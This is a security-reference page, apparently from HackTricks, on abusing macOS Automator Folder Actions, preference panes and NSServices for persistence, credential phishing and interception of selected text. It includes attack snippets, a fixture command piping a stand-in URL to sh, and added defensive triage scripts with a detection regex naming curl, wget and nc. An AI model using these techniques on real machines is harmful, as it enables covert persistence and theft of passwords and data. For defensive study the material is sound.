Abusing macOS Automator, Preference Panes & NSServices
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Browse the full HackTricks Training catalogue for the assessment paths (ARTA/GRTA/AzRTA) and Linux Hacking Expert (LHE).
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group, the telegram group, follow @hacktricks_live on X/Twitter, or check the LinkedIn page and YouTube channel.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Automator Actions & Workflows
Basic Information
Automator is the graphical automation tool of macOS. It executes workflows (.workflow bundles) built from actions (.action bundles). Automator also drives Folder Actions, Quick Actions, and the Shortcuts integration.
Automator actions are plugins loaded into the Automator runtime when a workflow runs. They can:
- Execute arbitrary shell scripts
- Process files and data
- Interact with applications via AppleScript
- Be chained together for complex automation
Why This Matters
Warning
Automator workflows can be social-engineered into execution — they appear as simple document files. A .workflow bundle can contain embedded shell commands that execute when the workflow runs. Combined with Folder Actions, they provide automatic persistence that triggers on file events.
Discovery
# Find Automator actions installed on the system
find / -name "*.action" -path "*/Automator/*" -type d 2>/dev/null
# Find user-created workflows
find ~/Library/Services -name "*.workflow" 2>/dev/null
find ~/Library/Workflows -name "*.workflow" 2>/dev/null
# List active Folder Actions
defaults read ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist 2>/dev/null
# Using the scanner
sqlite3 /tmp/executables.db "
SELECT e.path, h.handler_metadata
FROM executables e
JOIN executable_handlers eh ON e.id = eh.executable_id
JOIN handlers h ON eh.handler_id = h.id
WHERE h.handler_type = 'automator_action';"
Attack: Social-Engineered Workflow
To most users a .workflow bundle looks like an ordinary document file:
# Create a workflow programmatically
mkdir -p /tmp/Evil.workflow/Contents
cat > /tmp/Evil.workflow/Contents/document.wflow << 'PLIST'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AMApplicationBuild</key>
<string>523</string>
<key>AMApplicationVersion</key>
<string>2.10</string>
<key>actions</key>
<array>
<dict>
<key>action</key>
<dict>
<key>AMActionVersion</key>
<string>2.0.3</string>
<key>AMApplication</key>
<array>
<string>Automator</string>
</array>
<key>AMBundleID</key>
<string>com.apple.RunShellScript</string>
</dict>
</dict>
</array>
</dict>
</plist>
PLIST
Attack: Folder Action Persistence
Folder Actions run a workflow automatically when files are added to a watched folder:
# Register a Folder Action on ~/Downloads
# Every file the user downloads triggers the workflow
# Method 1: Via AppleScript
osascript -e '
tell application "System Events"
make new folder action at end of folder actions with properties {name:"Downloads", path:(path to downloads folder)}
tell folder action "Downloads"
make new script at end of scripts with properties {name:"Evil", path:"/path/to/evil.workflow"}
end tell
set folder actions enabled to true
end tell'
# Method 2: Via the Folder Actions Setup utility
# Users can be tricked into installing a Folder Action through a .workflow double-click
Caution
Folder Actions survive reboots and run silently. A Folder Action on ~/Downloads means every downloaded file triggers your payload, including files from Safari, Chrome, AirDrop, and mail attachments.
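As an added triage example (not code from this page), the following Python script parses a workflow bundle's document.wflow, the plist format shown above, and reports every Run Shell Script action together with its embedded command, so an analyst can review workflows found under ~/Library/Services or wired up as Folder Actions without opening them in Automator. The ActionParameters keys COMMAND_STRING and shell are the ones Automator writes for that action; the sample document, the suspicious-token list and the com.example.OtherAction bundle ID are constructed for the demo.

```python
"""Triage Automator .workflow bundles for embedded shell commands.
Added example for defenders; not part of the HackTricks page."""
import plistlib
import re
from pathlib import Path

# Action bundle IDs whose parameters carry code that runs when the workflow executes.
# com.apple.RunShellScript is the one shown on the page; extend the set as needed.
SCRIPT_ACTION_IDS = {"com.apple.RunShellScript"}

# Tokens that warrant analyst attention in an embedded command (heuristic, not proof).
SUSPICIOUS = re.compile(r"\b(curl|wget|osascript|base64|launchctl|nohup|python3?|nc)\b")


def triage_workflow(wflow_bytes: bytes) -> list[dict]:
    """Parse a document.wflow plist and return one record per script-running action."""
    doc = plistlib.loads(wflow_bytes)
    findings = []
    for entry in doc.get("actions", []):
        action = entry.get("action", {})
        bundle_id = action.get("AMBundleID", "")
        if bundle_id not in SCRIPT_ACTION_IDS:
            continue
        # Automator stores the Run Shell Script body under ActionParameters/COMMAND_STRING.
        params = action.get("ActionParameters", {})
        command = params.get("COMMAND_STRING", "")
        findings.append({
            "bundle_id": bundle_id,
            "shell": params.get("shell", ""),
            "command": command,
            "suspicious": bool(SUSPICIOUS.search(command)),
        })
    return findings


def scan_workflows(root: Path) -> dict[str, list[dict]]:
    """Walk a directory tree (e.g. ~/Library/Services) and triage every .workflow bundle."""
    results = {}
    for wflow in root.rglob("*.workflow/Contents/document.wflow"):
        bundle = str(wflow.parent.parent)
        try:
            results[bundle] = triage_workflow(wflow.read_bytes())
        except (plistlib.InvalidFileException, ValueError) as exc:
            results[bundle] = [{"error": str(exc)}]
    return results


# Constructed sample document.wflow: the structure shown above plus an ActionParameters
# dict, as Automator writes it for a Run Shell Script action. The second action uses a
# placeholder bundle ID and is ignored by the triage.
SAMPLE_WFLOW = plistlib.dumps({
    "AMApplicationBuild": "523",
    "AMApplicationVersion": "2.10",
    "actions": [
        {"action": {
            "AMBundleID": "com.apple.RunShellScript",
            "ActionParameters": {
                "COMMAND_STRING": "curl -s http://example.invalid/stage | sh",
                "shell": "/bin/sh",
                "inputMethod": 0,
            },
        }},
        {"action": {"AMBundleID": "com.example.OtherAction"}},
    ],
})
EMPTY_WFLOW = plistlib.dumps({"actions": []})

if __name__ == "__main__":
    for finding in triage_workflow(SAMPLE_WFLOW):
        print(finding)
```

To run it against a live system, call scan_workflows(Path.home() / "Library" / "Services") and scan_workflows(Path.home() / "Library" / "Workflows"); any record with suspicious set to True is worth opening by hand, and a record with an error key indicates a document.wflow that is not a valid plist.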
Preference Panes
Basic Information
Preference panes (.prefPane bundles) are plugins loaded into System Settings (formerly System Preferences). They provide configuration UI panels for system or third-party features.
Why This Matters
- Preference panes run inside the System Settings process, which may hold elevated TCC permissions (accessibility, full disk access in some contexts)
- Third-party preference panes are loaded into this trusted process and inherit its security context
- Users install preference panes by double-clicking, an easy social-engineering vector
- Once installed they persist and load every time System Settings is opened to that pane
Discovery
# Find installed preference panes
ls /Library/PreferencePanes/ 2>/dev/null
ls ~/Library/PreferencePanes/ 2>/dev/null
ls /System/Library/PreferencePanes/
# Check for non-Apple preference panes (third-party)
find /Library/PreferencePanes ~/Library/PreferencePanes -name "*.prefPane" 2>/dev/null
# Using the scanner
sqlite3 /tmp/executables.db "
SELECT e.path, h.handler_metadata
FROM executables e
JOIN executable_handlers eh ON e.id = eh.executable_id
JOIN handlers h ON eh.handler_id = h.id
WHERE h.handler_type = 'preference_pane';"
Attack: Privilege Context Hijacking
A malicious preference pane inherits the security context of System Settings:
// Preference pane principal class
@interface MaliciousPrefPane : NSPreferencePane
@end
@implementation MaliciousPrefPane
- (void)mainViewDidLoad {
[super mainViewDidLoad];
// This code runs inside System Settings process
// It has System Settings' TCC permissions
// Example: read files accessible to System Settings
NSData *data = [NSData dataWithContentsOfFile:@"/path/to/protected/file"];
// Example: use Accessibility API if System Settings has it
AXUIElementRef systemWide = AXUIElementCreateSystemWide();
// ... control other applications
}
@end
Attack: Persistence via Installation
# Install a preference pane (user-level, no admin required)
cp -r /tmp/Evil.prefPane ~/Library/PreferencePanes/
# System-level (requires admin)
sudo cp -r /tmp/Evil.prefPane /Library/PreferencePanes/
# The pane loads every time the user opens System Settings and navigates to it
# For better persistence, set it as the default pane
Attack: UI Phishing
A preference pane can mimic legitimate system UI panels to phish for credentials:
// Display a fake authentication dialog
NSAlert *alert = [[NSAlert alloc] init];
alert.messageText = @"System Settings needs your password to make changes.";
alert.informativeText = @"Enter your password to allow this.";
[alert addButtonWithTitle:@"OK"];
[alert addButtonWithTitle:@"Cancel"];
NSSecureTextField *passwordField = [[NSSecureTextField alloc] initWithFrame:NSMakeRect(0, 0, 200, 24)];
alert.accessoryView = passwordField;
[alert runModal];
NSString *password = passwordField.stringValue;
// Exfiltrate password...
NSServices
Basic Information
NSServices let applications expose functionality to other applications through the Services menu (right-click → Services). When a user selects text or data and invokes a service, the selected data is sent to the service provider for processing.
Services are declared in the application's Info.plist under the NSServices key and registered with the pasteboard server (pbs).
Why This Matters
- Services sit in the data flow between applications: selected text from any application is sent to the service
- A malicious service can capture data from password managers, mail clients, or financial applications
- Services can return modified data to the calling application (man-in-the-middle on selection operations)
- Service names can be crafted to look legitimate ("Format Text", "Encrypt Selection", "Share")
Discovery
# List all registered services
/System/Library/CoreServices/pbs -dump_pboard 2>/dev/null
# Find apps providing services
find /Applications -name "Info.plist" -exec grep -l "NSServices" {} \; 2>/dev/null
# Check specific app's services
defaults read /Applications/SomeApp.app/Contents/Info.plist NSServices 2>/dev/null
# Using the scanner
sqlite3 /tmp/executables.db "
SELECT e.path, h.handler_metadata
FROM executables e
JOIN executable_handlers eh ON e.id = eh.executable_id
JOIN handlers h ON eh.handler_id = h.id
WHERE h.handler_type = 'service';"
Attack: Data Interception Service
<!-- Info.plist NSServices declaration -->
<key>NSServices</key>
<array>
<dict>
<key>NSMessage</key>
<string>processSelection</string>
<key>NSPortName</key>
<string>EvilService</string>
<key>NSSendTypes</key>
<array>
<string>NSStringPboardType</string>
</array>
<key>NSMenuItem</key>
<dict>
<key>default</key>
<string>Format Selected Text</string>
</dict>
</dict>
</array>
// Service handler — receives user-selected text from any application
- (void)processSelection:(NSPasteboard *)pboard
userData:(NSString *)userData
error:(NSString **)error {
NSString *selectedText = [pboard stringForType:NSPasteboardTypeString];
// selectedText contains whatever the user selected in any app
// Could be a password, credit card number, private message, etc.
// Exfiltrate the captured data
[self sendToC2:selectedText];
// Optionally return the text unchanged so user doesn't notice
[pboard clearContents];
[pboard setString:selectedText forType:NSPasteboardTypeString];
}
Attack: Data Modification (Man-in-the-Middle)
A service can alter the data it returns while appearing to provide legitimate functionality:
// A "Secure Encrypt" service that actually intercepts and modifies data
- (void)secureEncrypt:(NSPasteboard *)pboard
userData:(NSString *)userData
error:(NSString **)error {
NSString *original = [pboard stringForType:NSPasteboardTypeString];
// Log the original data (credential capture)
[self exfiltrate:original];
// Return modified data (e.g., replace bank account in a wire transfer)
NSString *modified = [original stringByReplacingOccurrencesOfString:@"original-account"
withString:@"attacker-account"];
[pboard clearContents];
[pboard setString:modified forType:NSPasteboardTypeString];
}
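The two service handlers above differ in one declarable property: a service that only declares NSSendTypes receives the selection, while one that also declares NSReturnTypes can hand a rewritten selection back. As an added audit example (not code from this page), the Python script below parses the NSServices array of an Info.plist, classifies each service by that property, and flags menu titles built around words such as "Secure" or "Encrypt" that invite users to route sensitive selections through it. The Info.plist content is constructed from the declaration shown above plus a return-type variant; the lure-word list, the com.example.sampleapp identifier and the third service are assumptions for the demo.

```python
"""Audit NSServices declarations in an application's Info.plist.
Added example for defenders; not part of the HackTricks page."""
import plistlib

# Pasteboard types that carry user-selected text: the legacy constant name used in the
# declaration above and the UTI that NSPasteboardTypeString resolves to.
TEXT_TYPES = {"NSStringPboardType", "public.utf8-plain-text"}

# Menu-title words that invite a user to hand over a sensitive selection (heuristic only).
LURE_WORDS = ("secure", "encrypt", "password", "copy", "share", "format")


def audit_services(info_plist: bytes, app_path: str) -> list[dict]:
    """Return one record per declared service with defender-relevant flags."""
    info = plistlib.loads(info_plist)
    report = []
    for svc in info.get("NSServices", []):
        title = svc.get("NSMenuItem", {}).get("default", "")
        send_types = set(svc.get("NSSendTypes", []))
        return_types = set(svc.get("NSReturnTypes", []))
        accepts_text = bool(send_types & TEXT_TYPES)
        if accepts_text and return_types:
            risk = "receives and can rewrite selected text"
        elif accepts_text:
            risk = "receives selected text"
        else:
            risk = "no text input"
        report.append({
            "app": app_path,
            "title": title,
            "message": svc.get("NSMessage", ""),
            "port": svc.get("NSPortName", ""),
            "risk": risk,
            "lure_title": any(word in title.lower() for word in LURE_WORDS),
        })
    return report


def review_worthy(report: list[dict]) -> list[dict]:
    """Services to look at first: those that take text and carry a lure-like menu title."""
    return [r for r in report if r["risk"] != "no text input" and r["lure_title"]]


# Constructed Info.plist: the declaration from the page, a variant that also declares
# NSReturnTypes (matching the "Secure Encrypt" handler), and a service with no text input.
SAMPLE_INFO_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.example.sampleapp",  # placeholder identifier
    "NSServices": [
        {
            "NSMessage": "processSelection",
            "NSPortName": "EvilService",
            "NSSendTypes": ["NSStringPboardType"],
            "NSMenuItem": {"default": "Format Selected Text"},
        },
        {
            "NSMessage": "secureEncrypt",
            "NSPortName": "EvilService",
            "NSSendTypes": ["public.utf8-plain-text"],
            "NSReturnTypes": ["public.utf8-plain-text"],
            "NSMenuItem": {"default": "Secure Encrypt"},
        },
        {
            "NSMessage": "openFolder",
            "NSPortName": "SampleApp",
            "NSSendTypes": ["public.file-url"],
            "NSMenuItem": {"default": "Open in SampleApp"},
        },
    ],
})

if __name__ == "__main__":
    for record in review_worthy(audit_services(SAMPLE_INFO_PLIST, "/Applications/SampleApp.app")):
        print(record)
```

On a real machine, feed the bytes of each Contents/Info.plist returned by the find command in the Discovery section to audit_services; the pbs -dump_pboard output then tells you which of the reported services are actually registered for the current user.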
Combined Attack Chains
Automator Folder Action → Credential Harvesting
1. Install Folder Action on ~/Downloads
2. Workflow scans every downloaded file for credentials/keys
3. grep -r "BEGIN RSA PRIVATE KEY\|password\|token" on each file
4. Exfiltrate findings
Preference Pane → TCC Privilege Escalation
1. Distribute malicious prefPane (social engineering)
2. User double-clicks → installed in ~/Library/PreferencePanes/
3. PrefPane runs inside System Settings context
4. Inherits System Settings' TCC grants
5. Access protected data, control other apps via inherited Accessibility
NSService → Password Manager Hijacking
1. Register a service named "Secure Copy"
2. User selects password in password manager
3. User right-clicks → Services → "Secure Copy"
4. Service receives the password text
5. Exfiltrate while placing it on clipboard normally
References
- Apple Developer — Automator Programming Guide
- Apple Developer — Preference Pane Programming Guide
- Apple Developer — Services Implementation Guide
- Objective-See — Folder Action Persistence